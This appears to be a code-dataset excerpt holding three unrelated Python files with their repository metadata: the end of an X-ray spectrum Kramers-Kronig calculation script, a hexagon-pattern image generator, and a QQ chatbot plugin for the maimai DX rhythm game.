if NearEdgeDataFile is not None:
NearEdge_Data = data.convert_data(data.load_data(NearEdgeDataFile, load_options),FromType=input_data_type,ToType='asf')
Full_E, Imaginary_Spectrum = data.merge_spectra(NearEdge_Data, Full_E, Imaginary_Spectrum, merge_points=merge_points, add_background=add_background, fix_distortions=fix_distortions)
Real_Spectrum = KK_PP(Full_E, Full_E, Imaginary_Spectrum, Relativistic_Correction)
if curve_tolerance is not None:
output_data = improve_accuracy(Full_E,Real_Spectrum,Imaginary_Spectrum, Relativistic_Correction, curve_tolerance, curve_recursion)
else:
Imaginary_Spectrum_Values = data.coeffs_to_ASF(Full_E, numpy.vstack((Imaginary_Spectrum,Imaginary_Spectrum[-1])))
output_data = numpy.vstack((Full_E,Real_Spectrum,Imaginary_Spectrum_Values)).T
return output_data
if __name__ == '__main__':
#use argparse here to get command line arguments
#process arguments and pass to a pythonic function
#I will abuse this section of code for initial testing
#Output = kk_calculate_real('../../data/Xy_norm_bgsub.txt', 'C10SH14', input_data_type='NEXAFS')
Output = kk_calculate_real('../../data/LaAlO3/LaAlO3_Exp.csv', 'LaAlO3', input_data_type='NEXAFS', fix_distortions=True, curve_tolerance=0.05)
#Output = kk_calculate_real('../../data/GaAs/As.xmu.csv', 'GaAs', input_data_type='NEXAFS', fix_distortions=True, curve_tolerance=0.05)
Stoichiometry = data.ParseChemicalFormula('LaAlO3')
#Stoichiometry = data.ParseChemicalFormula('GaAs')
Relativistic_Correction = calc_relativistic_correction(Stoichiometry)
ASF_E, ASF_Data = data.calculate_asf(Stoichiometry)
ASF_Data3 = data.coeffs_to_linear(ASF_E, ASF_Data, 0.1)
ASF_Data2 = data.coeffs_to_ASF(ASF_E, numpy.vstack((ASF_Data,ASF_Data[-1])))
#Test_E = (Output[1:,0]+Output[0:-1,0])*0.5
#Test_E = numpy.linspace(41257.87,41259.87,num=21)
#Real_Spectrum2 = KK_PP(Test_E, Output[:,0], Im, Relativistic_Correction)
import matplotlib
matplotlib.use('WXAgg')
import pylab
pylab.figure()
pylab.plot(Output[:,0],Output[:,1],'xg-',Output[:,0],Output[:,2],'xb-')
pylab.plot(ASF_E,ASF_Data2,'+r')
#pylab.plot(ASF_E,ASF_Data22,'xr')
pylab.plot(ASF_Data3[0],ASF_Data3[1],'r-')
#pylab.plot(Test_E,Real_Spectrum2,'*y')
pylab.xscale('log')
pylab.show()
| [((14, 9, 14, 36), 'logging.getLogger', 'logging.getLogger', ({(14, 27, 14, 35): '__name__'}, {}), '(__name__)', False, 'import logging, sys\n'), ((16, 1, 16, 41), 'logging.basicConfig', 'logging.basicConfig', (), '', False, 'import logging, sys\n'), ((17, 1, 17, 41), 'logging.StreamHandler', 'logging.StreamHandler', (), '', False, 'import logging, sys\n'), ((68, 10, 68, 37), 'logging.getLogger', 'logging.getLogger', ({(68, 28, 68, 36): '__name__'}, {}), '(__name__)', False, 'import logging, sys\n'), ((80, 4, 80, 25), 'numpy.any', 'numpy.any', ({(80, 14, 80, 24): '(orders <= -2)'}, {}), '(orders <= -2)', False, 'import numpy\n'), ((84, 4, 84, 24), 'numpy.any', 'numpy.any', ({(84, 14, 84, 23): '(orders >= 0)'}, {}), '(orders >= 0)', False, 'import numpy\n'), ((91, 4, 91, 26), 'numpy.any', 'numpy.any', ({(91, 14, 91, 25): '(orders <= -3)'}, {}), '(orders <= -3)', False, 'import numpy\n'), ((122, 10, 122, 37), 'logging.getLogger', 'logging.getLogger', ({(122, 28, 122, 36): '__name__'}, {}), '(__name__)', False, 'import logging, sys\n'), ((131, 10, 131, 53), 'numpy.sum', 'numpy.sum', (), '', False, 'import numpy\n'), ((135, 13, 135, 36), 'numpy.any', 'numpy.any', (), '', False, 'import numpy\n'), ((236, 17, 236, 59), 'data.ParseChemicalFormula', 'data.ParseChemicalFormula', ({(236, 43, 236, 58): 'ChemicalFormula'}, {}), '(ChemicalFormula)', False, 'import data\n'), ((238, 30, 238, 63), 'data.calculate_asf', 'data.calculate_asf', ({(238, 49, 238, 62): 'Stoichiometry'}, {}), '(Stoichiometry)', False, 'import data\n'), ((259, 17, 259, 52), 'data.ParseChemicalFormula', 'data.ParseChemicalFormula', ({(259, 43, 259, 51): '"""LaAlO3"""'}, {}), "('LaAlO3')", False, 'import data\n'), ((262, 19, 262, 52), 'data.calculate_asf', 'data.calculate_asf', ({(262, 38, 262, 51): 'Stoichiometry'}, {}), '(Stoichiometry)', False, 'import data\n'), ((263, 13, 263, 56), 'data.coeffs_to_linear', 'data.coeffs_to_linear', ({(263, 35, 263, 40): 'ASF_E', (263, 42, 263, 50): 'ASF_Data', (263, 52, 263, 55): '0.1'}, {}), '(ASF_E, ASF_Data, 0.1)', False, 'import data\n'), ((272, 1, 272, 24), 'matplotlib.use', 'matplotlib.use', ({(272, 16, 272, 23): '"""WXAgg"""'}, {}), "('WXAgg')", False, 'import matplotlib\n'), ((275, 1, 275, 15), 'pylab.figure', 'pylab.figure', ({}, {}), '()', False, 'import pylab\n'), ((276, 1, 276, 72), 'pylab.plot', 'pylab.plot', ({(276, 12, 276, 23): 'Output[:, (0)]', (276, 24, 276, 35): 'Output[:, (1)]', (276, 36, 276, 41): '"""xg-"""', (276, 42, 276, 53): 'Output[:, (0)]', (276, 54, 276, 65): 'Output[:, (2)]', (276, 66, 276, 71): '"""xb-"""'}, {}), "(Output[:, (0)], Output[:, (1)], 'xg-', Output[:, (0)], Output[:,\n (2)], 'xb-')", False, 'import pylab\n'), ((277, 1, 277, 33), 'pylab.plot', 'pylab.plot', ({(277, 12, 277, 17): 'ASF_E', (277, 18, 277, 27): 'ASF_Data2', (277, 28, 277, 32): '"""+r"""'}, {}), "(ASF_E, ASF_Data2, '+r')", False, 'import pylab\n'), ((279, 1, 279, 43), 'pylab.plot', 'pylab.plot', ({(279, 12, 279, 24): 'ASF_Data3[0]', (279, 25, 279, 37): 'ASF_Data3[1]', (279, 38, 279, 42): '"""r-"""'}, {}), "(ASF_Data3[0], ASF_Data3[1], 'r-')", False, 'import pylab\n'), ((281, 1, 281, 20), 'pylab.xscale', 'pylab.xscale', ({(281, 14, 281, 19): '"""log"""'}, {}), "('log')", False, 'import pylab\n'), ((282, 1, 282, 13), 'pylab.show', 'pylab.show', ({}, {}), '()', False, 'import pylab\n'), ((173, 40, 173, 97), 'numpy.vstack', 'numpy.vstack', ({(173, 53, 173, 96): '(Imaginary_Spectrum, Imaginary_Spectrum[-1])'}, {}), '((Imaginary_Spectrum, Imaginary_Spectrum[-1]))', False, 'import numpy\n'), ((185, 
17, 185, 64), 'data.coeffs_to_ASF', 'data.coeffs_to_ASF', ({(185, 36, 185, 45): 'midpoints', (185, 47, 185, 63): 'temp_Im_spectrum'}, {}), '(midpoints, temp_Im_spectrum)', False, 'import data\n'), ((192, 27, 192, 46), 'numpy.sum', 'numpy.sum', ({(192, 37, 192, 45): 'improved'}, {}), '(improved)', False, 'import numpy\n'), ((194, 14, 194, 81), 'numpy.insert', 'numpy.insert', ({(194, 27, 194, 36): 'Im_values', (194, 37, 194, 57): 'new_points[improved]', (194, 58, 194, 80): 'Im_midpoints[improved]'}, {}), '(Im_values, new_points[improved], Im_midpoints[improved])', False, 'import numpy\n'), ((195, 14, 195, 81), 'numpy.insert', 'numpy.insert', ({(195, 27, 195, 36): 'Re_values', (195, 37, 195, 57): 'new_points[improved]', (195, 58, 195, 80): 'Re_midpoints[improved]'}, {}), '(Re_values, new_points[improved], Re_midpoints[improved])', False, 'import numpy\n'), ((196, 13, 196, 76), 'numpy.insert', 'numpy.insert', ({(196, 26, 196, 34): 'E_values', (196, 35, 196, 55): 'new_points[improved]', (196, 56, 196, 75): 'midpoints[improved]'}, {}), '(E_values, new_points[improved], midpoints[improved])', False, 'import numpy\n'), ((198, 20, 198, 69), 'numpy.repeat', 'numpy.repeat', (), '', False, 'import numpy\n'), ((218, 8, 218, 52), 'numpy.vstack', 'numpy.vstack', ({(218, 21, 218, 51): '(E_values, Re_values, Im_values)'}, {}), '((E_values, Re_values, Im_values))', False, 'import numpy\n'), ((241, 31, 241, 183), 'data.merge_spectra', 'data.merge_spectra', (), '', False, 'import data\n'), ((264, 39, 264, 76), 'numpy.vstack', 'numpy.vstack', ({(264, 52, 264, 75): '(ASF_Data, ASF_Data[-1])'}, {}), '((ASF_Data, ASF_Data[-1]))', False, 'import numpy\n'), ((85, 12, 85, 34), 'numpy.where', 'numpy.where', ({(85, 24, 85, 33): '(orders >= 0)'}, {}), '(orders >= 0)', False, 'import numpy\n'), ((92, 12, 92, 35), 'numpy.where', 'numpy.where', ({(92, 24, 92, 34): '(orders <= -3)'}, {}), '(orders <= -3)', False, 'import numpy\n'), ((130, 155, 130, 204), 'numpy.absolute', 'numpy.absolute', ({(130, 170, 130, 203): '((X2 - E + 1 * (X2 == E)) / (X1 - E + 1 * (X1 == E)))'}, {}), '((X2 - E + 1 * (X2 == E)) / (X1 - E + 1 * (X1 == E)))', False, 'import numpy\n'), ((134, 36, 134, 59), 'numpy.any', 'numpy.any', (), '', False, 'import numpy\n'), ((142, 113, 142, 144), 'numpy.absolute', 'numpy.absolute', ({(142, 128, 142, 143): '((X2 - XE) / (X1 - XE))'}, {}), '((X2 - XE) / (X1 - XE))', False, 'import numpy\n'), ((181, 27, 181, 46), 'numpy.sum', 'numpy.sum', ({(181, 37, 181, 45): 'improved'}, {}), '(improved)', False, 'import numpy\n'), ((240, 36, 240, 82), 'data.load_data', 'data.load_data', ({(240, 51, 240, 67): 'NearEdgeDataFile', (240, 69, 240, 81): 'load_options'}, {}), '(NearEdgeDataFile, load_options)', False, 'import data\n'), ((246, 57, 246, 114), 'numpy.vstack', 'numpy.vstack', ({(246, 70, 246, 113): '(Imaginary_Spectrum, Imaginary_Spectrum[-1])'}, {}), '((Imaginary_Spectrum, Imaginary_Spectrum[-1]))', False, 'import numpy\n'), ((247, 16, 247, 78), 'numpy.vstack', 'numpy.vstack', ({(247, 29, 247, 77): '(Full_E, Real_Spectrum, Imaginary_Spectrum_Values)'}, {}), '((Full_E, Real_Spectrum, Imaginary_Spectrum_Values))', False, 'import numpy\n'), ((129, 333, 129, 362), 'numpy.absolute', 'numpy.absolute', ({(129, 348, 129, 361): '((X2 + E) / (X1 + E))'}, {}), '((X2 + E) / (X1 + E))', False, 'import numpy\n'), ((78, 43, 78, 87), 'numpy.absolute', 'numpy.absolute', ({(78, 58, 78, 86): '(X[1:, :, :] + E) / (X[:-1, :, :] + E)'}, {}), '((X[1:, :, :] + E) / (X[:-1, :, :] + E))', False, 'import numpy\n'), ((82, 66, 82, 124), 
'numpy.absolute', 'numpy.absolute', ({(82, 81, 82, 123): '(X[1:, :, (orders <= -2)] / X[:-1, :, (orders <= -2)])'}, {}), '(X[1:, :, (orders <= -2)] / X[:-1, :, (orders <= -2)])', False, 'import numpy\n'), ((128, 152, 128, 173), 'numpy.absolute', 'numpy.absolute', ({(128, 167, 128, 172): '(X2 / X1)'}, {}), '(X2 / X1)', False, 'import numpy\n'), ((199, 40, 199, 86), 'numpy.zeros', 'numpy.zeros', (), '', False, 'import numpy\n'), ((200, 15, 200, 55), 'numpy.vstack', 'numpy.vstack', ({(200, 28, 200, 54): '(new_points, new_points + 1)'}, {}), '((new_points, new_points + 1))', False, 'import numpy\n'), ((129, 152, 129, 173), 'numpy.absolute', 'numpy.absolute', ({(129, 167, 129, 172): '(X2 / X1)'}, {}), '(X2 / X1)', False, 'import numpy\n'), ((191, 19, 191, 38), 'numpy.sum', 'numpy.sum', ({(191, 29, 191, 37): 'improved'}, {}), '(improved)', False, 'import numpy\n')] |
dominicschaff/random | random-images/hexxy.py | 14a19b976a09c768ab8844b7cda237c17a92c9ae | from PIL import ImageDraw, Image
from math import cos,sin,radians
from random import randint
import sys
a = "a0A1b2B3c4C5d6D7e8E9f!F,g.G/h?H<i>I:j;J'k\"K\\l|L/m M\nn\tN@o#O$p%P^q&Q*r(R)s_S-t+T=u{U}v[V]w W x X y Y z Z"
if len(a) > 128:
print("TOO MANY CHARACTERS")
sys.exit(1)
# for i in a:
# print("%s -> %d %d %d %d %d %d %d "%(i,
# 1 if a.index(i) & 1 == 1 else 0,
# 1 if a.index(i) & 2 == 2 else 0,
# 1 if a.index(i) & 4 == 4 else 0,
# 1 if a.index(i) & 8 == 8 else 0,
# 1 if a.index(i) & 16 == 16 else 0,
# 1 if a.index(i) & 32 == 32 else 0,
# 1 if a.index(i) & 64 == 64 else 0,
# ))
# sys.exit(0)
WHITE=(255,255,255)
PINK=(217,154,197)
BLUE=(103,170,249)
BLACK=(0,0,0)
img = Image.new('RGB', (2560,1600), BLACK)
id = ImageDraw.Draw(img)
def hex(offset, size):
points = []
x,y = offset
for angle in range(0, 360, 60):
x += cos(radians(angle)) * size
y += sin(radians(angle)) * size
points.append((x, y))
return points
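# For example (values assumed for illustration): hex((0, 0), 10) steps through
# the angles 0, 60, ..., 300 degrees, so its first vertex is (10, 0) and each
# later vertex adds the next unit step scaled by size, tracing one hexagon.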
def drawHex(id, sx,sy,s,c):
ox = sx - cos(radians(120)) * s
oy = sy - sin(radians(120)) * s
id.polygon(hex((ox-s,oy-s*2),s), fill=BLUE if c & 1 == 1 else PINK)
id.polygon(hex((ox+s,oy-s*2),s), fill=BLUE if c & 2 == 2 else PINK)
id.polygon(hex((ox-s*2,oy),s), fill=BLUE if c & 4 == 4 else PINK)
id.polygon(hex((ox,oy),s), fill=BLUE if c & 8 == 8 else PINK)
id.polygon(hex((ox+s*2,oy),s), fill=BLUE if c & 16 == 16 else PINK)
id.polygon(hex((ox-s,oy+s*2),s), fill=BLUE if c & 32 == 32 else PINK)
id.polygon(hex((ox+s,oy+s*2),s), fill=BLUE if c & 64 == 64 else PINK)
q = """This is a test
0123456789%"""
s = 10
cutOff = int(2560/(s*7))
print (cutOff)
x,y = 0,0
for c in q:
drawHex(id, s*2 + x*s*7, s*3 + y*s*7, s, a.index(c))
x+=1
if x >= cutOff or c == "\n":
x,y = 0,y+1
img.show() | [((28, 6, 28, 42), 'PIL.Image.new', 'Image.new', ({(28, 16, 28, 21): '"""RGB"""', (28, 23, 28, 34): '(2560, 1600)', (28, 36, 28, 41): 'BLACK'}, {}), "('RGB', (2560, 1600), BLACK)", False, 'from PIL import ImageDraw, Image\n'), ((29, 5, 29, 24), 'PIL.ImageDraw.Draw', 'ImageDraw.Draw', ({(29, 20, 29, 23): 'img'}, {}), '(img)', False, 'from PIL import ImageDraw, Image\n'), ((9, 4, 9, 15), 'sys.exit', 'sys.exit', ({(9, 13, 9, 14): '(1)'}, {}), '(1)', False, 'import sys\n'), ((36, 17, 36, 31), 'math.radians', 'radians', ({(36, 25, 36, 30): 'angle'}, {}), '(angle)', False, 'from math import cos, sin, radians\n'), ((37, 17, 37, 31), 'math.radians', 'radians', ({(37, 25, 37, 30): 'angle'}, {}), '(angle)', False, 'from math import cos, sin, radians\n'), ((42, 18, 42, 30), 'math.radians', 'radians', ({(42, 26, 42, 29): '(120)'}, {}), '(120)', False, 'from math import cos, sin, radians\n'), ((43, 18, 43, 30), 'math.radians', 'radians', ({(43, 26, 43, 29): '(120)'}, {}), '(120)', False, 'from math import cos, sin, radians\n')] |
LonelyFantasy/Chiyuki-Bot | src/plugins/maimaidx.py | 16a91b96661825c2a367a12c30d6a28ad13b95a9 | import math
from collections import defaultdict
import asyncio
from typing import List, Dict, Any, Tuple
from nonebot import on_command, on_message, on_notice, on_regex, get_driver
from nonebot.log import logger
from nonebot.permission import Permission
from nonebot.typing import T_State
from nonebot.adapters import Event, Bot
from nonebot.adapters.cqhttp import Message, MessageSegment, GroupMessageEvent, PrivateMessageEvent
from src.libraries.maimaidx_guess import GuessObject
from src.libraries.tool import hash
from src.libraries.maimaidx_music import *
from src.libraries.image import *
from src.libraries.maimai_best_40 import generate
import requests
import json
import random
import time
import re
from urllib import parse
driver = get_driver()
@driver.on_startup
def _():
logger.info("Load help text successfully")
help_text: dict = get_driver().config.help_text
help_text['mai'] = ('查看舞萌相关功能', """桜千雪です、よろしく。
可用命令如下:
今日舞萌 查看今天的舞萌运势
XXXmaimaiXXX什么 随机一首歌
随个[dx/标准][绿黄红紫白]<难度> 随机一首指定条件的乐曲
查歌<乐曲标题的一部分> 查询符合条件的乐曲
[绿黄红紫白]id<歌曲编号> 查询乐曲信息或谱面信息
<歌曲别名>是什么歌 查询乐曲别名对应的乐曲
定数查歌 <定数> 查询定数对应的乐曲
定数查歌 <定数下限> <定数上限>
分数线 <难度+歌曲id> <分数线> 详情请输入“分数线 帮助”查看""")
def song_txt(music: Music):
return Message([
{
"type": "text",
"data": {
"text": f"{music.id}. {music.title}\n"
}
},
{
"type": "image",
"data": {
"file": f"https://www.diving-fish.com/covers/{music.id}.jpg"
}
},
{
"type": "text",
"data": {
"text": f"\n{'/'.join(music.level)}"
}
}
])
def inner_level_q(ds1, ds2=None):
result_set = []
diff_label = ['Bas', 'Adv', 'Exp', 'Mst', 'ReM']
if ds2 is not None:
music_data = total_list.filter(ds=(ds1, ds2))
else:
music_data = total_list.filter(ds=ds1)
for music in music_data:
for i in music.diff:
result_set.append((music['id'], music['title'], music['ds'][i], diff_label[i], music['level'][i]))
return result_set
inner_level = on_command('inner_level ', aliases={'定数查歌 '})
@inner_level.handle()
async def _(bot: Bot, event: Event, state: T_State):
argv = str(event.get_message()).strip().split(" ")
if len(argv) > 2 or len(argv) == 0:
await inner_level.finish("命令格式为\n定数查歌 <定数>\n定数查歌 <定数下限> <定数上限>")
return
if len(argv) == 1:
result_set = inner_level_q(float(argv[0]))
else:
result_set = inner_level_q(float(argv[0]), float(argv[1]))
if len(result_set) > 50:
await inner_level.finish("数据超出 50 条,请尝试缩小查询范围")
return
s = ""
for elem in result_set:
s += f"{elem[0]}. {elem[1]} {elem[3]} {elem[4]}({elem[2]})\n"
await inner_level.finish(s.strip())
spec_rand = on_regex(r"^随个(?:dx|sd|标准)?[绿黄红紫白]?[0-9]+\+?")
@spec_rand.handle()
async def _(bot: Bot, event: Event, state: T_State):
level_labels = ['绿', '黄', '红', '紫', '白']
regex = "随个((?:dx|sd|标准))?([绿黄红紫白]?)([0-9]+\+?)"
res = re.match(regex, str(event.get_message()).lower())
try:
if res.groups()[0] == "dx":
tp = ["DX"]
elif res.groups()[0] == "sd" or res.groups()[0] == "标准":
tp = ["SD"]
else:
tp = ["SD", "DX"]
level = res.groups()[2]
if res.groups()[1] == "":
music_data = total_list.filter(level=level, type=tp)
else:
music_data = total_list.filter(level=level, diff=['绿黄红紫白'.index(res.groups()[1])], type=tp)
await spec_rand.send(song_txt(music_data.random()))
except Exception as e:
print(e)
await spec_rand.finish("随机命令错误,请检查语法")
mr = on_regex(r".*maimai.*什么")
@mr.handle()
async def _(bot: Bot, event: Event, state: T_State):
await mr.finish(song_txt(total_list.random()))
search_music = on_regex(r"^查歌.+")
@search_music.handle()
async def _(bot: Bot, event: Event, state: T_State):
regex = "查歌(.+)"
name = re.match(regex, str(event.get_message())).groups()[0].strip()
if name == "":
return
res = total_list.filter(title_search=name)
await search_music.finish(Message([
{"type": "text",
"data": {
"text": f"{music['id']}. {music['title']}\n"
}} for music in res]))
query_chart = on_regex(r"^([绿黄红紫白]?)id([0-9]+)")
@query_chart.handle()
async def _(bot: Bot, event: Event, state: T_State):
regex = "([绿黄红紫白]?)id([0-9]+)"
groups = re.match(regex, str(event.get_message())).groups()
level_labels = ['绿', '黄', '红', '紫', '白']
if groups[0] != "":
try:
level_index = level_labels.index(groups[0])
level_name = ['Basic', 'Advanced', 'Expert', 'Master', 'Re: MASTER']
name = groups[1]
music = total_list.by_id(name)
chart = music['charts'][level_index]
ds = music['ds'][level_index]
level = music['level'][level_index]
file = f"https://www.diving-fish.com/covers/{music['id']}.jpg"
if len(chart['notes']) == 4:
msg = f'''{level_name[level_index]} {level}({ds})
TAP: {chart['notes'][0]}
HOLD: {chart['notes'][1]}
SLIDE: {chart['notes'][2]}
BREAK: {chart['notes'][3]}
谱师: {chart['charter']}
'''
else:
msg = f'''{level_name[level_index]} {level}({ds})
TAP: {chart['notes'][0]}
HOLD: {chart['notes'][1]}
SLIDE: {chart['notes'][2]}
TOUCH: {chart['notes'][3]}
BREAK: {chart['notes'][4]}
谱师: {chart['charter']}
'''
await query_chart.send(Message([
{
"type": "text",
"data": {
"text": f"{music['id']}. {music['title']}\n"
}
},
{
"type": "image",
"data": {
"file": f"{file}"
}
},
{
"type": "text",
"data": {
"text": msg
}
}
]))
except Exception:
await query_chart.send("未找到该谱面")
else:
name = groups[1]
music = total_list.by_id(name)
try:
file = f"https://www.diving-fish.com/covers/{music['id']}.jpg"
await query_chart.send(Message([
{
"type": "text",
"data": {
"text": f"{music['id']}. {music['title']}\n"
}
},
{
"type": "image",
"data": {
"file": f"{file}"
}
},
{
"type": "text",
"data": {
"text": f"艺术家: {music['basic_info']['artist']}\n分类: {music['basic_info']['genre']}\nBPM: {music['basic_info']['bpm']}\n版本: {music['basic_info']['from']}\n难度: {'/'.join(music['level'])}"
}
}
]))
except Exception:
await query_chart.send("未找到该乐曲")
wm_list = ['拼机', '推分', '越级', '下埋', '夜勤', '练底力', '练手法', '打旧框', '干饭', '抓绝赞', '收歌']
jrwm = on_command('今日舞萌', aliases={'今日mai'})
@jrwm.handle()
async def _(bot: Bot, event: Event, state: T_State):
qq = int(event.get_user_id())
h2 = hash(qq)
h = h2
rp = h % 100
wm_value = []
for i in range(11):
wm_value.append(h & 3)
h >>= 2
s = f"今日人品值:{rp}\n"
for i in range(11):
if wm_value[i] == 3:
s += f'宜 {wm_list[i]}\n'
elif wm_value[i] == 0:
s += f'忌 {wm_list[i]}\n'
s += "千雪提醒您:打机时不要大力拍打或滑动哦\n今日推荐歌曲:"
music = total_list[h2 % len(total_list)]
await jrwm.finish(Message([
{"type": "text", "data": {"text": s}}
] + song_txt(music)))
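# How the fortune above is derived (a plain reading of the handler): hash(qq)
# seeds everything, h % 100 is the luck value, and eleven 2-bit fields are
# peeled off with h & 3 followed by h >>= 2; a field of 3 marks the matching
# activity as favourable (宜) and 0 as unfavourable (忌).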
music_aliases = defaultdict(list)
f = open('src/static/aliases.csv', 'r', encoding='utf-8')
tmp = f.readlines()
f.close()
for t in tmp:
arr = t.strip().split('\t')
for i in range(len(arr)):
if arr[i] != "":
music_aliases[arr[i].lower()].append(arr[0])
find_song = on_regex(r".+是什么歌")
@find_song.handle()
async def _(bot: Bot, event: Event, state: T_State):
regex = "(.+)是什么歌"
name = re.match(regex, str(event.get_message())).groups()[0].strip().lower()
if name not in music_aliases:
await find_song.finish("未找到此歌曲\n舞萌 DX 歌曲别名收集计划:https://docs.qq.com/sheet/DSXhaUXVsRlhxRmtJ")
return
result_set = music_aliases[name]
if len(result_set) == 1:
music = total_list.by_title(result_set[0])
await find_song.finish(Message([{"type": "text", "data": {"text": "您要找的是不是"}}] + song_txt(music)))
else:
s = '\n'.join(result_set)
await find_song.finish(f"您要找的可能是以下歌曲中的其中一首:\n{ s }")
query_score = on_command('分数线')
query_score_text = '''此功能为查找某首歌分数线设计。
命令格式:分数线 <难度+歌曲id> <分数线>
例如:分数线 白337 100
命令将返回分数线允许的 TAP GREAT 容错以及 BREAK 50落等价的 TAP GREAT 数。
以下为 TAP GREAT 的对应表:
GREAT/GOOD/MISS
TAP 1/2.5/5
HOLD 2/5/10
SLIDE 3/7.5/15
TOUCH 1/2.5/5
BREAK 5/12.5/25(外加200落)'''
query_score_mes = Message([{
"type": "image",
"data": {
"file": f"base64://{str(image_to_base64(text_to_image(query_score_text)), encoding='utf-8')}"
}
}])
@query_score.handle()
async def _(bot: Bot, event: Event, state: T_State):
r = "([绿黄红紫白])(?:id)?([0-9]+)"
argv = str(event.get_message()).strip().split(" ")
if len(argv) == 1 and argv[0] == '帮助':
await query_score.send(query_score_mes)
elif len(argv) == 2:
try:
grp = re.match(r, argv[0]).groups()
level_labels = ['绿', '黄', '红', '紫', '白']
level_labels2 = ['Basic', 'Advanced', 'Expert', 'Master', 'Re:MASTER']
level_index = level_labels.index(grp[0])
chart_id = grp[1]
line = float(argv[1])
music = total_list.by_id(chart_id)
            chart: Dict[str, Any] = music['charts'][level_index]
tap = int(chart['notes'][0])
slide = int(chart['notes'][2])
hold = int(chart['notes'][1])
touch = int(chart['notes'][3]) if len(chart['notes']) == 5 else 0
brk = int(chart['notes'][-1])
total_score = 500 * tap + slide * 1500 + hold * 1000 + touch * 500 + brk * 2500
break_bonus = 0.01 / brk
break_50_reduce = total_score * break_bonus / 4
reduce = 101 - line
if reduce <= 0 or reduce >= 101:
raise ValueError
await query_chart.send(f'''{music['title']} {level_labels2[level_index]}
分数线 {line}% 允许的最多 TAP GREAT 数量为 {(total_score * reduce / 10000):.2f}(每个-{10000 / total_score:.4f}%),
BREAK 50落(一共{brk}个)等价于 {(break_50_reduce / 100):.3f} 个 TAP GREAT(-{break_50_reduce / total_score * 100:.4f}%)''')
except Exception:
await query_chart.send("格式错误或未找到乐曲,输入“分数线 帮助”以查看帮助信息")
best_40_pic = on_command('b40')
@best_40_pic.handle()
async def _(bot: Bot, event: Event, state: T_State):
username = str(event.get_message()).strip()
print(event.message_id)
if username == "":
payload = {'qq': str(event.get_user_id())}
else:
payload = {'username': username}
img, success = await generate(payload)
if success == 400:
await best_40_pic.send("未找到此玩家,请确保此玩家的用户名和查分器中的用户名相同。")
elif success == 403:
await best_40_pic.send("该用户禁止了其他人获取数据。")
else:
await best_40_pic.send(Message([
MessageSegment.reply(event.message_id),
MessageSegment.image(f"base64://{str(image_to_base64(img), encoding='utf-8')}")
]))
disable_guess_music = on_command('猜歌设置', priority=0)
@disable_guess_music.handle()
async def _(bot: Bot, event: Event):
if event.message_type != "group":
return
arg = str(event.get_message())
group_members = await bot.get_group_member_list(group_id=event.group_id)
for m in group_members:
if m['user_id'] == event.user_id:
break
su = get_driver().config.superusers
if m['role'] != 'owner' and m['role'] != 'admin' and str(m['user_id']) not in su:
await disable_guess_music.finish("只有管理员可以设置猜歌")
return
db = get_driver().config.db
c = await db.cursor()
if arg == '启用':
await c.execute(f'update guess_table set enabled=1 where group_id={event.group_id}')
elif arg == '禁用':
await c.execute(f'update guess_table set enabled=0 where group_id={event.group_id}')
else:
await disable_guess_music.finish("请输入 猜歌设置 启用/禁用")
await db.commit()
await disable_guess_music.finish("设置成功")
guess_dict: Dict[Tuple[str, str], GuessObject] = {}
guess_cd_dict: Dict[Tuple[str, str], float] = {}
guess_music = on_command('猜歌', priority=0)
async def guess_music_loop(bot: Bot, event: Event, state: T_State):
await asyncio.sleep(10)
guess: GuessObject = state["guess_object"]
if guess.is_end:
return
cycle = state["cycle"]
if cycle < 6:
asyncio.create_task(bot.send(event, f"{cycle + 1}/7 这首歌" + guess.guess_options[cycle]))
else:
asyncio.create_task(bot.send(event, Message([
MessageSegment.text("7/7 这首歌封面的一部分是:"),
MessageSegment.image("base64://" + str(guess.b64image, encoding="utf-8")),
MessageSegment.text("答案将在 30 秒后揭晓")
])))
asyncio.create_task(give_answer(bot, event, state))
return
state["cycle"] += 1
asyncio.create_task(guess_music_loop(bot, event, state))
async def give_answer(bot: Bot, event: Event, state: T_State):
await asyncio.sleep(30)
guess: GuessObject = state["guess_object"]
if guess.is_end:
return
asyncio.create_task(bot.send(event, Message([MessageSegment.text("答案是:" + f"{guess.music['id']}. {guess.music['title']}\n"), MessageSegment.image(f"https://www.diving-fish.com/covers/{guess.music['id']}.jpg")])))
del guess_dict[state["k"]]
@guess_music.handle()
async def _(bot: Bot, event: Event, state: T_State):
mt = event.message_type
k = (mt, event.user_id if mt == "private" else event.group_id)
if mt == "group":
gid = event.group_id
db = get_driver().config.db
c = await db.cursor()
await c.execute(f"select * from guess_table where group_id={gid}")
data = await c.fetchone()
if data is None:
await c.execute(f'insert into guess_table values ({gid}, 1)')
elif data[1] == 0:
await guess_music.send("本群已禁用猜歌")
return
if k in guess_dict:
if k in guess_cd_dict and time.time() > guess_cd_dict[k] - 400:
# 如果已经过了 200 秒则自动结束上一次
del guess_dict[k]
else:
await guess_music.send("当前已有正在进行的猜歌")
return
whitelists = get_driver().config.whitelists
if not (mt == "group" and gid in whitelists):
if len(guess_dict) >= 5:
await guess_music.finish("千雪有点忙不过来了。现在正在猜的群有点多,晚点再试试如何?")
return
if k in guess_cd_dict and time.time() < guess_cd_dict[k]:
await guess_music.finish(f"已经猜过啦,下次猜歌会在 {time.strftime('%H:%M', time.localtime(guess_cd_dict[k]))} 可用噢")
return
guess = GuessObject()
guess_dict[k] = guess
state["k"] = k
state["guess_object"] = guess
state["cycle"] = 0
guess_cd_dict[k] = time.time() + 600
await guess_music.send("我将从热门乐曲中选择一首歌,并描述它的一些特征,请输入歌曲的【id】、【歌曲标题】或【歌曲标题中 5 个以上连续的字符】进行猜歌(DX乐谱和标准乐谱视为两首歌)。猜歌时查歌等其他命令依然可用。\n警告:这个命令可能会很刷屏,管理员可以使用【猜歌设置】指令进行设置。")
asyncio.create_task(guess_music_loop(bot, event, state))
guess_music_solve = on_message(priority=20)
@guess_music_solve.handle()
async def _(bot: Bot, event: Event, state: T_State):
mt = event.message_type
k = (mt, event.user_id if mt == "private" else event.group_id)
if k not in guess_dict:
return
ans = str(event.get_message())
guess = guess_dict[k]
# await guess_music_solve.send(ans + "|" + guess.music['id'])
if ans == guess.music['id'] or (ans.lower() == guess.music['title'].lower()) or (len(ans) >= 5 and ans.lower() in guess.music['title'].lower()):
guess.is_end = True
del guess_dict[k]
await guess_music_solve.finish(Message([
MessageSegment.reply(event.message_id),
MessageSegment.text("猜对了,答案是:" + f"{guess.music['id']}. {guess.music['title']}\n"),
MessageSegment.image(f"https://www.diving-fish.com/covers/{guess.music['id']}.jpg")
]))
